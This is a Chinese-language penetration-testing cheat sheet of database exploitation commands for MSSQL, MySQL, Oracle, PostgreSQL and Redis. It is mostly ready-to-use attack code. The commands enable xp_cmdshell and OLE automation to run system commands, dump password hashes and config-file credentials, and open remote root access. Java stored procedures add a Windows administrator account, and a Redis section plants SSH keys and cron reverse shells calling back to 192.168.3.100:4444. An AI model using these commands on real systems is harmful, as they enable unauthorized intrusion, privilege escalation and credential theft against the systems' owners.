数据库命令
8.1 Mssql
Mssql查找开放端口
for /f "tokens=2" %i in ('tasklist /FI "SERVICES eq MSSQLSERVER" /NH') do netstat -ano | findstr %i | findstr LISTENING
Mssql开启xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
Mssql关闭xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;
Mssql xp_cmdshell执行命令
EXEC master..xp_cmdshell "whoami /user";
Mssql开启SP_OACreate
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
Mssql关闭SP_OACreate
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',0;RECONFIGURE;
Mssql执行命令有回显-SP_OACreate
-- Variant with captured output: the command's stdout is read back through OLE
-- Automation objects (sp_OACreate / sp_OAMethod, see the enable/disable lines above).
declare @luan int,@exec int,@text int,@str varchar(8000);
-- @luan receives the handle of the automation object created from this CLSID
-- (presumably the same object the no-output variant below names as 'wscript.shell').
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@luan output;
-- 'exec' starts the command line; the object it hands back is kept in @exec.
exec sp_oamethod @luan,'exec',@exec output,'C:\\windows\\system32\\cmd.exe /c whoami';
-- @text is that object's StdOut stream; 'readall' drains the stream into @str.
exec sp_oamethod @exec, 'StdOut', @text out;
exec sp_oamethod @text, 'readall', @str out
-- @str is varchar(8000), so output longer than that is presumably truncated.
select @str;
declare @test int,@exec int,@text int,@str varchar(8000);exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@test output;exec sp_oamethod @test,'exec',@exec output,'ipconfig /all';exec sp_oamethod @exec, 'StdOut', @text out;exec sp_oamethod @text, 'readall', @str out;select @str;--+
Mssql执行命令无回显-SP_OACreate
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >C:\\Window\\Temp\\1.txt'
- Mssql执行命令
sp_execute_external_script
- 开启sp_execute_external_script
EXECUTE sp_configure 'external scripts enabled', 1;RECONFIGURE;
- 利用Python语言执行系统命令
EXECUTE sp_execute_external_script
@language =N'Python',
@script=N'import subprocess;subprocess.call(["whoami"],shell=True)'
- 利用R语言执行系统命令
EXECUTE sp_execute_external_script
@language = N'R',
@script = N'system("whoami")'
Mssql输出base64文件
exec master..xp_cmdshell '>>c:\windows\temp\vars.txt set /p="123456" <nul'; //代替echo输出
查看c盘下web.config文件
findstr /c:"User Id=" /c:"Password=" /si web.config >> tmp.log
findstr /c:"uid=" /c:"Password=" /si web.config >> tmp.log
常规工作组内网环境下查找mssql实例
PowerShell -Command "[System.Data.Sql.SqlDataSourceEnumerator]::Instance.GetDataSources()"
Mssql查询sa密码
select name,password from syslogins
Mssql查询sa密码
Select master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins where name = 'sa'
列出所有库
SELECT name FROM MASTER..SysDatabases ORDER BY Name;--+
SELECT NAME FROM MASTER.dbo.SysDatabases ORDER BY NAME;--+
列出某个库所有表
SELECT Name FROM [databasename]..SysObjects Where XType='U' ORDER BY Name;--+
列出表的字段
SELECT TABLE_CATALOG,TABLE_NAME,COLUMN_NAME,DATA_TYPE from [databasename].information_schema.columns where TABLE_NAME = 'tablename';--+
SELECT COLUMN_NAME,DATA_TYPE from [databasename].information_schema.columns where TABLE_NAME = 'tablename';--+
varbinary数据类型hex编码
SELECT TOP 2 sys.fn_varbintohexstr(pass),user FROM [dbo].[admin];--+
xp_dirtree列目录
exec master.dbo.xp_dirtree [c:\windows\],1,1;--+
exec master.dbo.xp_dirtree 'c:\windows\',1,1;--+
exec xp_subdirs "C:\\WINDOWS\\"
写表读取本地文件
CREATE TABLE temp (data varchar(2000));--+
BULK INSERT dbo.temp FROM 'C:\Windows\System32\inetsrv\config\applicationHost.config';--+
select * from dbo.temp;--+
查询sqlserver数据库如何批量查询每个表前10条内容
database=School
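-- Preview the first @top_n rows of every user table in the School database.
-- One dynamic SELECT is executed per table, so each table comes back as its
-- own result set.
DECLARE @top_n INT = 10;            -- rows per table (the heading asks for 10; the earlier version used 1000)
DECLARE @table_schema SYSNAME;
DECLARE @table_name SYSNAME;
DECLARE @sql_string NVARCHAR(MAX);

-- Query the catalog of the School database directly (three-part name) so the
-- script works whatever the current database is. TABLE_CATALOG holds the bare
-- database name; comparing it with 'database=School' never matched a row.
DECLARE table_cursor CURSOR LOCAL FAST_FORWARD FOR
    SELECT TABLE_SCHEMA, TABLE_NAME
    FROM School.INFORMATION_SCHEMA.TABLES
    WHERE TABLE_TYPE = 'BASE TABLE'
      AND TABLE_CATALOG = 'School'
    ORDER BY TABLE_SCHEMA, TABLE_NAME;

OPEN table_cursor;
FETCH NEXT FROM table_cursor INTO @table_schema, @table_name;

WHILE @@FETCH_STATUS = 0
BEGIN
    -- QUOTENAME brackets each identifier, so a table or schema name containing
    -- spaces, dots or brackets can neither break nor alter the generated statement.
    -- The schema is taken from the catalog instead of assuming dbo.
    SET @sql_string = N'SELECT TOP (' + CAST(@top_n AS NVARCHAR(10)) + N') * FROM '
        + QUOTENAME('School') + N'.' + QUOTENAME(@table_schema) + N'.' + QUOTENAME(@table_name) + N';';
    EXECUTE (@sql_string);
    FETCH NEXT FROM table_cursor INTO @table_schema, @table_name;
END;

CLOSE table_cursor;
DEALLOCATE table_cursor;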
查询sqlserver数据库如何批量查询每个表前10条内容,并备份为csv文件,我们可以利用bcp
database=School
==========================================================================================
-T 表示使用 Trusted Connection。当使用 -T 参数时,bcp 将使用 Windows 身份验证来连接到 SQL Server。
-S 指定要连接的 SQL Server 实例的名称。
默认实例: MSSQLSERVER
HOSTNAME=IIS85-CN
实例名=SQLEXPRESS
bcp "SELECT name FROM School.sys.tables" queryout C:\backup\tables.txt -c -t, -T -S IIS85-CN
bcp "SELECT name FROM School.sys.tables" queryout C:\backup\tables.txt -c -t, -T -S IIS85-CN\SQLEXPRESS
==========================================================================================
bcp "SELECT name FROM School.sys.tables" queryout C:\backup\tables.txt -c -t, -S localhost -U sa -P admin
==========================================================================================
FOR /F %i IN (C:\backup\tables.txt) DO (
bcp "SELECT TOP 10 * FROM School.dbo.%i" queryout C:\backup\%i.csv -c -t, -S localhost -U sa -P admin
)
8.2 Mysql
Mysql基础命令
显示版本: select version();
显示字符集: select @@character_set_database;
显示数据库: show databases;
显示表名: show tables;
显示字段: show columns from table_name;
显示计算机名: select @@hostname;
系统版本: select @@version_compile_os;
mysql路径: select @@basedir;
数据库路径: select @@datadir;
describe: describe table_name;
显示root密码: select User,Password from mysql.user;
导入文件: select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C);
导出文件: select 'testtest' into outfile '/var/www/html/test.txt' from mysql.user;
开启外连: GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;
mysql安装路径: show variables;
更新数据库: UPDATE `DX15`.`dx15_common_member` SET `uid` = '1' WHERE `dx15_common_member`.`uid` =40407;更新40407uid变成uid1
mysql更改root密码: mysqladmin -u root password "newpwd";
查询表: select concat(User,0x3a,Password) from mysql.user;
获取数据库所有表: SHOW TABLES FROM `databases`;
获取列前20行: SELECT * FROM `admin_bbs` ORDER BY 1 DESC LIMIT 0,20;
获取表行数: SELECT COUNT(*) AS CNT FROM `dede_admin`;
更新mysql root密码
update user set authentication_string=PASSWORD('123456') where user='root';
flush privileges;
sqlmap mysql udf 提权
sqlmap -d "mysql://root:123456@192.168.3.184:3306/mysql" --os-shell --random-agent
查看数据库及操作系统的架构
select @@version_compile_os, @@version_compile_machine;
show variables like '%compile%';
查看secure_file_priv属性
show global variables like '%secure%';
show global variables like '%secure_file_priv%';
查看plugin目录
select @@plugin_dir ;
show variables like 'plugin%';
8.3 Oracle
查询SID
select instance_name from v$instance
查询当前IP
select sys_context('userenv','ip_address') from dual
sqlplus远程连接
sqlplus system/123456@192.168.3.100:1521/orcl
oracle 提权 有回显 需要sqlplus
赋权
begin dbms_java.grant_permission( 'PUBLIC', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'read,write,execute,delete' );end;
/
创建java代码
-- Stores the Java class below in the database as source unit EXE_LINUX; the
-- PL/SQL wrapper that follows binds to Test.list_cmd. (No blank lines inside
-- the source: SQL*Plus would treat one as the end of the statement.)
create or replace and compile java source named exe_linux as
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.UnknownHostException; // not used anywhere in the class
public class Test
{
// Runs the command line `str` through Runtime.exec and prints its stdout,
// then its stderr, line by line to System.out. Nothing is returned to the
// caller: the return value is always "" and the output is only visible
// because the calling session enables SERVEROUTPUT / dbms_java.set_output.
public static String list_cmd(String str){
Runtime runtime=Runtime.getRuntime();
// Charset used to decode both streams; built with a StringBuffer although a
// plain String literal would do.
StringBuffer enco = new StringBuffer();
enco.append("GBK");
try{
// Runtime.exec(String) splits the command line on whitespace itself.
Process proc =runtime.exec(str);
InputStream inp_suc=proc.getInputStream();
InputStream inp_err=proc.getErrorStream();
BufferedReader bfr_err = new BufferedReader(new InputStreamReader(inp_err,enco.toString()));
BufferedReader bfr_suc = new BufferedReader(new InputStreamReader(inp_suc,enco.toString()));
String strLine;
// stdout is drained completely before stderr is touched. A child that fills
// the stderr pipe while stdout is still open can block here — the streams
// would need to be read concurrently to avoid that.
while( (strLine=(bfr_suc.readLine())) != null){
System.out.println(strLine);
}
while( (strLine=(bfr_err.readLine())) != null){
System.out.println(strLine);
}
proc.destroy();
inp_suc.close();
inp_err.close();
}catch (Exception e) {
// Any failure (e.g. the command cannot be started) is reported on the same
// output channel rather than propagated to the caller.
System.out.println("EXECUTE IS ERROR!");
System.out.println(e.getMessage());
}
return "";
}
/* public static void main(String[] args){
list_cmd(args[0]);
}
**/
}
/
create or replace procedure p_exe_linux(str varchar2) as language java
name 'Test.list_cmd(java.lang.String)';
/
SET SERVEROUTPUT ON
exec dbms_java.set_output(1111111111111);
EXEC P_EXE_LINUX('whoami');
oracle 提权 无回显 需要sqlplus
-- Stores the Java class below as source unit JAVACMD; the MYJAVACMD wrapper
-- that follows binds to JAVACMD.execmd.
create or replace and resolve java source named JAVACMD as
import java.lang.*; // implicit in Java; the import is redundant
import java.io.*;
public class JAVACMD
{
// Fire-and-forget: starts `command` and discards the Process handle, so no
// output, exit status or stderr is ever observed. An IOException from exec
// (e.g. the command cannot be started) propagates to the caller.
public static void execmd(String command) throws IOException
{
Runtime.getRuntime().exec(command);
}
}
/
create or replace procedure MYJAVACMD(command in varchar) as language java
name 'JAVACMD.execmd(java.lang.String)';
/
EXEC MYJAVACMD('net user ASP.NET Admin12345 /add');
EXEC MYJAVACMD('net localgroup administrators Admin12345 /add');
https://loong716.top/posts/Oracle_Database_Security/ 渗透过程中Oracle数据库的利用
https://www.helloworld.net/p/5623921467 Oracle数据库提权(dba权限执行系统命令)
8.4 PostgreSql
查找postgresql 所有数据库名字
select datname from pg_database;
# 删除并创建用于保存系统命令执行结果的表
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
# 命令执行测试,多试几条
COPY cmd_exec FROM PROGRAM 'id';
COPY cmd_exec FROM PROGRAM 'ifconfig';
# 查看结果
SELECT * FROM cmd_exec;
8.5 Redis
Redis未授权写密钥
ssh-keygen
cat .ssh/id_rsa.pub
redis-cli -h 173.239.46.188 -a password
指定目录
config set dir /root/.ssh
指定文件名
config set dbfilename authorized_keys
设置公钥内容
set x "\n\n\n id_rsa.pub \n\n\n"
保存
save
Redis未授权写反弹shell
set x "\n* * * * * exec /bin/sh 0</dev/tcp/192.168.3.100/4444 1>&0 2>&0\n"
set x "\n* * * * * bash -i >& /dev/tcp/192.168.3.100/4444 0>&1\n"
config set dir /var/spool/cron
config set dbfilename root
save